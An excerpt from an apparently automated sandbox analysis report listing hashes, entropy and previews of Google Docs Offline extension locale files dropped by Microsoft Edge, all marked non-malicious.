                                                                                                                                                                                                                                                                                                                            Size (bytes):3830
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                                                            MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                                                            SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                                                            SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                                                            SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1898
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                                                            MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                                                            SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                                                            SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                                                            SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):914
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                                                            MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                                                            SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                                                            SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                                                            SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\nn\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):851
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                                            MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                                            SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                                            SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                                            SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):878
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                                                            MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                                                            SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                                                            SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                                                            SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2766
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                                                            MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                                                            SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                                                            SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                                                            SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):978
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                                                            MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                                                            SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                                                            SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                                                            SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):907
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                                                            MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                                                            SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                                                            SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                                                            SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):914
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                                                            MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                                                            SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                                                            SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                                                            SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):937
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                                                            MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                                                            SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                                                            SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                                                            SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1337
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                                                            MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                                                            SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                                                            SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                                                            SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2846
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                                                            MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                                                            SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                                                            SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                                                            SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):934
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                                                            MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                                                            SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                                                            SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                                                            SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                                                            Malicious:false
